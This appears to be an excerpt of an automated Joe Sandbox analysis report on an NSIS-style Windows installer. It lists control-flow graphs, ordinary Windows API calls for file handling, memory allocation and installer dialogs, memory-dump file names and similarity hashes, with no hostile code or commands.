                                        • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 731 405e7f-405e8b 732 405e8c-405ec0 GetTickCount GetTempFileNameW 731->732 733 405ec2-405ec4 732->733 734 405ecf-405ed1 732->734 733->732 736 405ec6 733->736 735 405ec9-405ecc 734->735 736->735
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 737 4078c5-4078cb 738 4078d0-4078eb 737->738 739 4078cd-4078cf 737->739 740 407aeb-407aff 738->740 741 407bad-407bba 738->741 739->738 743 407b01-407b17 740->743 744 407b19-407b2c 740->744 742 407be7-407beb 741->742 745 407c4a-407c5d 742->745 746 407bed-407c0c 742->746 747 407b33-407b3a 743->747 744->747 750 407c65-407c68 745->750 751 407c25-407c39 746->751 752 407c0e-407c23 746->752 748 407b61-407b64 747->748 749 407b3c-407b40 747->749 748->750 753 407b46-407b5e 749->753 754 407ccd-407cd4 749->754 758 407350 750->758 759 407cec 750->759 755 407c3c-407c43 751->755 752->755 753->748 757 407cdd-407cea 754->757 760 407be1-407be4 755->760 761 407c45 755->761 762 407cef-407cf6 757->762 763 407357-40735b 758->763 764 40749b-4074b6 758->764 765 40746d-407471 758->765 766 4073ff-407403 758->766 759->762 760->742 768 407cd6 761->768 769 407bc6-407bde 761->769 763->757 771 407361-40736e 763->771 764->740 772 407c76-407c7d 765->772 773 407477-40748b 765->773 774 407409-407420 766->774 775 407c6d-407c74 766->775 768->757 769->760 771->759 776 407374-4073ba 771->776 772->757 777 40748e-407496 773->777 778 407423-407427 774->778 775->757 780 4073e2-4073e4 776->780 781 4073bc-4073c0 776->781 777->765 782 407498 777->782 778->766 779 407429-40742f 778->779 783 407431-407438 779->783 784 407459-40746b 779->784 787 4073f5-4073fd 780->787 788 4073e6-4073f3 780->788 785 4073c2-4073c5 GlobalFree 781->785 786 4073cb-4073d9 GlobalAlloc 781->786 782->764 789 407443-407453 GlobalAlloc 783->789 790 40743a-40743d GlobalFree 783->790 784->777 785->786 786->759 791 4073df 786->791 787->778 788->787 788->788 789->759 789->784 790->789 791->780
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 792 407ac3-407ac7 793 407ac9-407bba 792->793 794 407ade-407ae4 792->794 804 407be7-407beb 793->804 796 407aeb-407aff 794->796 797 407b01-407b17 796->797 798 407b19-407b2c 796->798 801 407b33-407b3a 797->801 798->801 802 407b61-407b64 801->802 803 407b3c-407b40 801->803 807 407c65-407c68 802->807 805 407b46-407b5e 803->805 806 407ccd-407cd4 803->806 808 407c4a-407c5d 804->808 809 407bed-407c0c 804->809 805->802 810 407cdd-407cea 806->810 816 407350 807->816 817 407cec 807->817 808->807 812 407c25-407c39 809->812 813 407c0e-407c23 809->813 815 407cef-407cf6 810->815 814 407c3c-407c43 812->814 813->814 823 407be1-407be4 814->823 824 407c45 814->824 818 407357-40735b 816->818 819 40749b-4074b6 816->819 820 40746d-407471 816->820 821 4073ff-407403 816->821 817->815 818->810 825 407361-40736e 818->825 819->796 826 407c76-407c7d 820->826 827 407477-40748b 820->827 829 407409-407420 821->829 830 407c6d-407c74 821->830 823->804 831 407cd6 824->831 832 407bc6-407bde 824->832 825->817 833 407374-4073ba 825->833 826->810 834 40748e-407496 827->834 835 407423-407427 829->835 830->810 831->810 832->823 837 4073e2-4073e4 833->837 838 4073bc-4073c0 833->838 834->820 839 407498 834->839 835->821 836 407429-40742f 835->836 840 407431-407438 836->840 841 407459-40746b 836->841 844 4073f5-4073fd 837->844 845 4073e6-4073f3 837->845 842 4073c2-4073c5 GlobalFree 838->842 843 4073cb-4073d9 GlobalAlloc 838->843 839->819 846 407443-407453 GlobalAlloc 840->846 847 40743a-40743d GlobalFree 840->847 841->834 842->843 843->817 848 4073df 843->848 844->835 845->844 845->845 846->817 846->841 847->846 848->837
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 849 407312-407330 850 407332-407335 849->850 851 40733a-407341 849->851 852 407cf0-407cf6 850->852 853 407344-40734a 851->853 854 407350 853->854 855 407cec 853->855 856 407357-40735b 854->856 857 40749b-407aff 854->857 858 40746d-407471 854->858 859 4073ff-407403 854->859 860 407cef 855->860 861 407361-40736e 856->861 862 407cdd-407cea 856->862 870 407b01-407b17 857->870 871 407b19-407b2c 857->871 863 407c76-407c7d 858->863 864 407477-40748b 858->864 866 407409-407420 859->866 867 407c6d-407c74 859->867 860->852 861->855 868 407374-4073ba 861->868 862->860 863->862 869 40748e-407496 864->869 872 407423-407427 866->872 867->862 874 4073e2-4073e4 868->874 875 4073bc-4073c0 868->875 869->858 876 407498 869->876 877 407b33-407b3a 870->877 871->877 872->859 873 407429-40742f 872->873 880 407431-407438 873->880 881 407459-40746b 873->881 884 4073f5-4073fd 874->884 885 4073e6-4073f3 874->885 882 4073c2-4073c5 GlobalFree 875->882 883 4073cb-4073d9 GlobalAlloc 875->883 876->857 878 407b61-407c68 877->878 879 407b3c-407b40 877->879 878->853 886 407b46-407b5e 879->886 887 407ccd-407cd4 879->887 888 407443-407453 GlobalAlloc 880->888 889 40743a-40743d GlobalFree 880->889 881->869 882->883 883->855 891 4073df 883->891 884->872 885->884 885->885 886->878 887->862 888->855 888->881 889->888 891->874
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                        APIs
                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID:
                                        • API String ID: 3394109436-0
                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                        APIs
                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Char$Next$CreateDirectoryPrev
                                        • String ID:
                                        • API String ID: 4115351271-0
                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                        • GetClientRect.USER32(?,?), ref: 00405196
                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
